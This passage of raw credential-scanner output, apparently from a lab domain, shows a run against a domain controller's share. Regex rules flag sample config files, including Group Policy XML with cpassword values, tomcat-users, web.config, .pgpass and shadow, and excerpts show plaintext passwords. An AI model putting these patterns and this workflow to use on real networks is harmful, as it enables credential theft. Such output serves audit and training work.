\ \ \ \ \ \$credentials\ \+=\ \[pscustomobject]@\{\r\n\ \ \ \ \ \ \ \ \ \ \ \ User\ \ \ \ \ =\ \$username\r\n\ \ \ \ \ \ \ \ \ \ \ \ Password\ =\ \$password\r\n\ \ \ \ \ \ \ \ \ \ \ \ Source\ \ \ =\ "AutoLogon [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|2.6kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-tomcat-users.xml.ps1) \r\n\ \ <role\ rolename="admin-script"/>\r\n\ \ <role\ rolename="manager-gui"/>\r\n\ \ <role\ rolename="manager-status"/>\r\n\ \ <role\ rolename="manager-script"/>\r\n\ \ <role\ rolename="manager-jmx"/>\r\n\ \ <user\ name="admin"\ password="admin"\ roles="admin-gui,admin-script,manager-gui,manager-status,manager-script,manager-jmx"/>\r\n</tomcat-users>\r\n\r\n\#> [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Green}<KeepNameContainsGreen|R|credential|215B|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\.git-credentials) .git-credentials [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepConfigByName|R|^\.htpasswd$|135B|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\.htpasswd) .htpasswd [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Green}<KeepShellRcFilesByName|R|^\.netrc$|639B|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\.netrc) .netrc [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Green}<KeepNameContainsGreen|R|passw|135B|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\.htpasswd) .htpasswd [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepDbMgtConfigByName|R|^\.pgpass$|429B|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\.pgpass) .pgpass [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|2.8kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-winscp.ini.ps1) encoded\)\r\n\ \ \ \ \$decryptedPassword\ =\ \[System\.Text\.Encoding]::UTF8\.GetString\(\$decryptedBytes\)\r\n\r\n\ \ \ \ return\ \$decryptedPassword\r\n}\r\n\r\n\#\ Example\ usage\ with\ an\ encrypted\ password\ from\ WinSCP\.ini\r\n\$encryptedPassword\ =\ "Base64EncryptedPasswordHere"\r\n\$decryptedPassword\ =\ ConvertFrom-DPAPI\ -EncryptedPassword\ \$encryptedPassword\r\nWrite-Output\ "Decrypted\ Password:\ \$decryptedPassword"\r\n\r\n\r\n\#>\r\n\r\n\r\n<\#\ winscp\.ini [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|13.2kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-web.config.ps1) tication\ settings\ for\ web\ applications\ -->\n\ \ \ \ <authentication\ mode="Forms">\n\ \ \ \ \ \ <forms\ loginUrl="login\.aspx"\ timeout="30">\n\ \ \ \ \ \ \ \ <credentials\ passwordFormat="Clear">\n\ \ \ \ \ \ \ \ \ \ <user\ name="user1"\ password="password1"\ />\n\ \ \ \ \ \ \ \ \ \ <user\ name="user2"\ password="password2"\ />\n\ \ \ \ \ \ \ \ </credentials>\n\ \ \ \ \ \ </forms>\n\ \ \ \ </authentication>\n\n\ \ \ \ <!--\ Authorization\ settings\ to\ allow\ or\ deny\ user\ access\ - [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepDbMgtConfigByName|R|^dbvis\.xml$|422B|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\dbvis.xml) dbvis.xml [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Yellow}<KeepCSharpDbConnStringsYellow|R|Data Source=.+Integrated Security=(SSPI|true)|4kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\app.config) "Data\ Source=localhost;Initial\ Catalog=myDB;User\ ID=myUser;Password=myPass;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\ \ \ \ <add\ name="SqlServerIntegratedSecurity"\r\n\ \ \ \ \ \ \ \ \ connectionString="Data\ Source=localhost;Initial\ Catalog=myDB;Integrated\ Security=True;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\ \ \ \ <add\ name="MySqlConnection"\r\n\ \ \ \ \ \ \ \ \ connectionString="Server=localhost;Da [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d?>\s*[^\s<]+\s*<|1.4kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\jboss-cli.xml) \ default\ is\ 9990\ -->\r\n\ \ \ \ </controller>\r\n\r\n\ \ \ \ <!--\ The\ authentication\ details\ for\ the\ controller\ -->\r\n\ \ \ \ <authentication>\r\n\ \ \ \ \ \ \ \ <username>admin</username>\ <!--\ Your\ management\ user\ -->\r\n\ \ \ \ \ \ \ \ <password>password</password>\ <!--\ Your\ management\ user's\ password\ -->\r\n\ \ \ \ </authentication>\r\n\r\n\ \ \ \ <!--\ Optionally\ enable\ secure\ connections\ using\ SSL\ -->\r\n\ \ \ \ <ssl>\r\n\ \ \ \ \ \ \ \ <enabled>false</enabled> [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d?>\s*[^\s<]+\s*<|422B|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\dbvis.xml) dbvis>\n\ \ \ \ <connections>\n\ \ \ \ \ \ \ \ <connection>\n\ \ \ \ \ \ \ \ \ \ \ \ <name>MyDatabaseConnection</name>\n\ \ \ \ \ \ \ \ \ \ \ \ <url>jdbc:mysql://localhost:3306/mydatabase</url>\n\ \ \ \ \ \ \ \ \ \ \ \ <user>db_user</user>\n\ \ \ \ \ \ \ \ \ \ \ \ <password>\+mQwYxIFaEjZ/MWJDkm1SCWhHw7xPXWd</password>\ <!--\ Encrypted\ using\ DES\ with\ default\ key\ or\ a\ master\ password\ -->\n\ \ \ \ \ \ \ \ \ \ \ \ <driver>com\.mysql\.jdbc\.Driver</driver>\n\ \ \ \ \ \ \ \ </connection>\n\ \ \ \ </c [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepRdpPasswords|R|password 51\:b|206B|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\example.rdp) screen mode id:i:2\ndesktopwidth:i:1920\ndesktopheight:i:1080\nsession bpp:i:32\nwinposstr:s:0,3,0,0,800,600\nfull address:s:yourserver.com\nusername:s:YourUsername\npassword 51:b:encrypted_password_value\n [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|404B|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\context.xml) h="Container"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ type="javax\.sql\.DataSource"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ maxTotal="100"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ maxIdle="30"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ maxWaitMillis="10000"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ username="dbuser"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ password="dbpassword"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ driverClassName="com\.mysql\.jdbc\.Driver"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ url="jdbc:mysql://localhost:3306/mydb"/>\r\n</Context> [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|779B|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\php.ini) Storing\ database\ credentials\ in\ php\.ini\ \(not\ recommended\)\r\n;\ This\ exposes\ credentials\ to\ anyone\ with\ access\ to\ php\.ini\ or\ via\ phpinfo\(\)\ if\ not\ secured\.\r\n\r\nmysql\.default_user\ =\ "dbuser"\r\nmysql\.default_password\ =\ "P@ssw0rd123"\r\nmysql\.default_host\ =\ "localhost"\r\nmysql\.default_database\ =\ "example_db"\r\n\r\n;\ Log\ errors\ to\ a\ file\r\nlog_errors\ =\ On\r\nerror_log\ =\ /var/log/php_errors\.log\r\n\r\n;\ Ensure\ that\ this\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Green}<KeepNameContainsGreen|R|passw|170B|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\pureftpd.passwd) pureftpd.passwd [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|1.5kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\DataSources.xml) F8-B6D3-4FE1-8925-FEBE6F15310A}">\r\n\ \ \ \ \ <Properties\ action="R"\ userDSN="1"\ dsn="LocalContacts"\ \r\n\ \ \ \ \ \ \ driver="Microsoft\ Access\ \(\*\.mdb\)"\ description="Local\ Access\ Database"\ \r\n\ \ \ \ \ \ \ username="test"\ cpassword="5gn5fUqMaeGJkLEPgl3iH9UfLATVxRAHE8GvAvekwnicLYf2Pynj7ifihvajBRA3">\r\n\ \ \ \ \ \ \ <Attributes>\r\n\ \ \ \ \ \ \ \ \ <Attribute\ name="DSN"\ value="C:\\USERS\\DEMO\.MDB"/>\r\n\ \ \ \ \ \ \ </Attributes>\r\n\ \ \ \ \ </Properties>\r [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepCSharpDbConnStringsRed|R|Data Source=.+(;|)Password=.+(;|)|4kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\app.config) word"\ value="customPassword"\ />\r\n\ \ </serviceCredentials>\r\n\r\n\ \ <!--\ Connection\ strings\ for\ various\ databases\ -->\r\n\ \ <connectionStrings>\r\n\ \ \ \ <add\ name="SqlServerConnection"\r\n\ \ \ \ \ \ \ \ \ connectionString="Data\ Source=localhost;Initial\ Catalog=myDB;User\ ID=myUser;Password=myPass;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\ \ \ \ <add\ name="SqlServerIntegratedSecurity"\r\n\ \ \ \ \ \ \ \ \ connectionString="D [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Yellow}<KeepCSharpDbConnStringsYellow|R|Data Source=.+Integrated Security=(SSPI|true)|7.5kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\machine.config) myUser;Password=myPass;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\r\n\ \ \ \ <!--\ SQL\ Server\ \(Windows\ Authentication\)\ -->\r\n\ \ \ \ <add\ name="SqlServerIntegratedSecurity"\r\n\ \ \ \ \ \ \ \ \ connectionString="Data\ Source=localhost;Initial\ Catalog=myDB;Integrated\ Security=True;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\r\n\ \ \ \ <!--\ SQL\ Server\ \(Encrypted\ Connection\)\ -->\r\n\ \ \ \ <add\ name="SqlServerEncry [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Black}<KeepNetConfigFileByName|R|^running-config$|1.5kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\running-config) running-config [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Yellow}<KeepDbConnStringPw|R|connectionstring.{1,200}passw|13.2kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-web.config.ps1) tion\ -key\ "UserName"\ -value\ \$value\ }\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ "Password"\ \{\ Add-CredentialPair\ -name\ "CustomService"\ -section\ \$section\ -key\ "Password"\ -value\ \$value\ }\n\ \ \ \ \ \ \ \ \ \ \ \ }\n\ \ \ \ \ \ \ \ }\n\ \ \ \ }\n\n\ \ \ \ \#\ Parse\ connectionStrings\ for\ server,\ port,\ username,\ and\ password\n\ \ \ \ if\ \(\$configXml\.configuration\.connectionStrings\)\ \{\n\ \ \ \ \ \ \ \ foreach\ \(\$connection\ in\ \$configXml\.configuration\.connectionStrings\.add\)\ \{\n\ \ \ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|780B|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\Drives.xml) A7E3-F1D8-4FB1-874F-D2F7D16F7065}">\r\n\ \ \ \ \ <Properties\ action="U"\ \r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ thisDrive="NOCHANGE"\ \r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ allDrives="NOCHANGE"\ \r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ userName="test"\ \r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ cpassword="5gn5fUqMaeGJkLEPgl3iH9UfLATVxRAHE8GvAvekwnicLYf2Pynj7ifihvajBRA3"\ \r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ path="\\\\scratch"\ \r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ label="SCRATCH"\ \r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ persistent="1"\ \r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|2.2kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\Printers.xml) ="\\\\PRN-CORP1\\b35-1053-a"\ \r\n\ \ \ \ \ \ \ \ \ \ \ location=""\ \r\n\ \ \ \ \ \ \ \ \ \ \ default="1"\ \r\n\ \ \ \ \ \ \ \ \ \ \ skipLocal="1"\ \r\n\ \ \ \ \ \ \ \ \ \ \ deleteAll="0"\ \r\n\ \ \ \ \ \ \ \ \ \ \ persistent="0"\ \r\n\ \ \ \ \ \ \ \ \ \ \ deleteMaps="0"\ \r\n\ \ \ \ \ \ \ \ \ \ \ cpassword="5gn5fUqMaeGJkLEPgl3iH9UfLATVxRAHE8GvAvekwnicLYf2Pynj7ifihvajBRA3"\r\n\ \ \ \ \ \ \ \ \ \ \ port=""/>\r\n\ \ \ </SharedPrinter>\r\n\ \ \ <PortPrinter\ \r\n\ \ \ \ \ \ \ \ \ \ \ clsid="\{C3A739D2-4A44-401e-9F9D-88E5E77DFB3E}"\ \r\n\ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|821B|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\Groups.xml) \n\ \ \ \ \ \ \ \ <Properties\ action="U"\ \r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ newName=""\ \r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ fullName="IT\ Department"\ \r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ description="Group\ for\ IT\ department\ staff"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ cpassword="5gn5fUqMaeGJkLEPgl3iH9UfLATVxRAHE8GvAvekwnicLYf2Pynj7ifihvajBRA3"\ \r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ changeLogon="0"\ \r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ noChange="0"\ \r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ neverExpires="0"\ \r\n\ \ \ \ \ \ \ \ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Black}<KeepNixLocalHashesByName|R|^shadow$|313B|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\shadow) shadow [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepCSharpDbConnStringsRed|R|Data Source=.+(;|)Password=.+(;|)|7.5kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\machine.config) viceCredentials>\ \ \ \r\n\r\n\ \ <!--\ Connection\ string\ settings\ -->\r\n\ \ <connectionStrings>\r\n\ \ \ \ <!--\ SQL\ Server\ \(Standard\ Authentication\)\ -->\r\n\ \ \ \ <add\ name="SqlServerConnection"\r\n\ \ \ \ \ \ \ \ \ connectionString="Data\ Source=localhost;Initial\ Catalog=myDB;User\ ID=myUser;Password=myPass;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\r\n\ \ \ \ <!--\ SQL\ Server\ \(Windows\ Authentication\)\ -->\r\n\ \ \ \ <add\ name="SqlSer [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d?>\s*[^\s<]+\s*<|2.2kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\standalone.xml) alhost:3306/mydatabase</connection-url>\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ <driver>mysql</driver>\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ <security>\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ <user-name>\$\{VAULT::vault::mydbuser}</user-name>\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ <password>\$\{VAULT::vault::mydbpassword}</password>\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ </security>\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ <pool>\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ <min-pool-size>5</min-pool-size>\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ <max-pool-size>20</max [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Black}<KeepNetConfigFileByName|R|^startup-config$|1.5kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\startup-config) startup-config [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|1.6kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\tomcat-users.xml) \r\n\ \ <role\ rolename="admin-script"/>\r\n\ \ <role\ rolename="manager-gui"/>\r\n\ \ <role\ rolename="manager-status"/>\r\n\ \ <role\ rolename="manager-script"/>\r\n\ \ <role\ rolename="manager-jmx"/>\r\n\ \ <user\ name="admin"\ password="admin"\ roles="admin-gui,admin-script,manager-gui,manager-status,manager-script,manager-jmx"/>\r\n</tomcat-users> [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|8.4kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\ScheduledTasks.xml) eteWhenDone="0"\ \r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ startOnlyIfIdle="0"\ \r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ stopOnIdleEnd="0"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ noStartIfOnBatteries="1"\ \r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ stopIfGoingOnBatteries="1"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ cpassword="5gn5fUqMaeGJkLEPgl3iH9UfLATVxRAHE8GvAvekwnicLYf2Pynj7ifihvajBRA3"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ systemRequired="0">\r\n\ \ \ \ \ \ \ <Triggers>\r\n\ \ \ \ \ \ \ \ \ <Trigger\ type="DAILY"\ \r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ startHour="10"\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|4.5kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\server.xml) ature>restConnector-2\.0</feature>\n\ \ \ \ <feature>jdbc-4\.2</feature>\n\ \ \ \ <feature>mpOpenApi-1\.0</feature>\n\ \ </featureManager>\n\n\ \ <variable\ name="onError"\ value="FAIL"/>\n\n\ \ <keyStore\ id="defaultKeyStore"\ password="Liberty"/>\n\ \ \n\ \ <basicRegistry>\n\ \ \ \ <user\ name="adminuser"\ password="adminpwd"\ />\n\ \ \ \ <user\ name="reader"\ password="readerpwd"\ />\n\ \ \ \ <user\ name="user"\ password="userpwd"\ />\n\ \ </basicRegistr [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|826B|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\Services.xml) ="LocalSystem"\ \r\n\ \ \ \ \ \ \ \ \ \ \ interact="1"\r\n\ \ \ \ \ \ \ \ \ \ \ firstFailure="NOACTION"\ \r\n\ \ \ \ \ \ \ \ \ \ \ secondFailure="NOACTION"\r\n\ \ \ \ \ \ \ \ \ \ \ thirdFailure="RESTART"\ \r\n\ \ \ \ \ \ \ \ \ \ \ resetFailCountDelay="0"\r\n\ \ \ \ \ \ \ \ \ \ \ cpassword="5gn5fUqMaeGJkLEPgl3iH9UfLATVxRAHE8GvAvekwnicLYf2Pynj7ifihvajBRA3"\r\n\ \ \ \ \ \ \ \ \ \ \ restartServiceDelay="900000"/>\r\n\t</NTService>\r\n</NTServices> [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|4kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\app.config) web>\r\n\ \ \ \ <compilation\ debug="true"\ />\r\n\ \ \ \ <authentication\ mode="Forms">\r\n\ \ \ \ \ \ <forms\ loginUrl="login\.aspx"\ timeout="30">\r\n\ \ \ \ \ \ \ \ <credentials\ passwordFormat="Clear">\r\n\ \ \ \ \ \ \ \ \ \ <user\ name="user1"\ password="password1"\ />\r\n\ \ \ \ \ \ \ \ \ \ <user\ name="user2"\ password="password2"\ />\r\n\ \ \ \ \ \ \ \ </credentials>\r\n\ \ \ \ \ \ </forms>\r\n\ \ \ \ </authentication>\r\n\ \ \ \ <customErrors\ mode="Off"\ />\r\n\ \ </system\.web>\r\n\r\n\ \ <!-- [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Yellow}<KeepCSharpDbConnStringsYellow|R|Data Source=.+Integrated Security=(SSPI|true)|5.6kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\web.config) "Data\ Source=localhost;Initial\ Catalog=myDB;User\ ID=myUser;Password=myPass;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\ \ \ \ <add\ name="SqlServerIntegratedSecurity"\r\n\ \ \ \ \ \ \ \ \ connectionString="Data\ Source=localhost;Initial\ Catalog=myDB;Integrated\ Security=True;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\ \ \ \ <add\ name="MySqlConnection"\r\n\ \ \ \ \ \ \ \ \ connectionString="Server=localhost;Da [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|7.5kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\machine.config) ="Forms">\r\n\ \ \ \ \ \ <!--\ Forms\ authentication\ with\ username\ and\ password\ -->\r\n\ \ \ \ \ \ <forms\ loginUrl="login\.aspx"\ timeout="30">\r\n\ \ \ \ \ \ \ \ <credentials\ passwordFormat="Clear">\r\n\ \ \ \ \ \ \ \ \ \ <user\ name="user1"\ password="password1"\ />\r\n\ \ \ \ \ \ \ \ \ \ <user\ name="user2"\ password="password2"\ />\r\n\ \ \ \ \ \ \ \ </credentials>\r\n\ \ \ \ \ \ </forms>\r\n\ \ \ \ </authentication>\r\n\ \ \ \ <customErrors\ mode="Off"\ />\r\n\ \ </system\.web>\r\n\r\n\ \ <!-- [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Yellow}<KeepDbConnStringPw|R|connectionstring.{1,200}passw|4kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\app.config) \ \ \ \ <add\ key="Password"\ value="customPassword"\ />\r\n\ \ </serviceCredentials>\r\n\r\n\ \ <!--\ Connection\ strings\ for\ various\ databases\ -->\r\n\ \ <connectionStrings>\r\n\ \ \ \ <add\ name="SqlServerConnection"\r\n\ \ \ \ \ \ \ \ \ connectionString="Data\ Source=localhost;Initial\ Catalog=myDB;User\ ID=myUser;Password=myPass;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\ \ \ \ <add\ name="SqlServerIntegratedSecurity"\r\n\ \ \ \ \ \ \ \ \ c [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepCSharpDbConnStringsRed|R|Data Source=.+(;|)Password=.+(;|)|5.6kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\web.config) word"\ value="customPassword"\ />\r\n\ \ </serviceCredentials>\r\n\r\n\ \ <!--\ Connection\ strings\ for\ various\ databases\ -->\r\n\ \ <connectionStrings>\r\n\ \ \ \ <add\ name="SqlServerConnection"\r\n\ \ \ \ \ \ \ \ \ connectionString="Data\ Source=localhost;Initial\ Catalog=myDB;User\ ID=myUser;Password=myPass;"\r\n\ \ \ \ \ \ \ \ \ providerName="System\.Data\.SqlClient"\ />\r\n\ \ \ \ <add\ name="SqlServerIntegratedSecurity"\r\n\ \ \ \ \ \ \ \ \ connectionString="D [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:15Z [File] {Red}<KeepCSharpDbConnStringsRed|R|Data Source=.+(;|)Password=.+(;|)|4kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\app.config) word"\ value="customPassword"\ />\r\n\ \ </serviceCredentials>\r\n\r\n\ \ <!--\ Connection\ strings\ for\ various\ databases\ 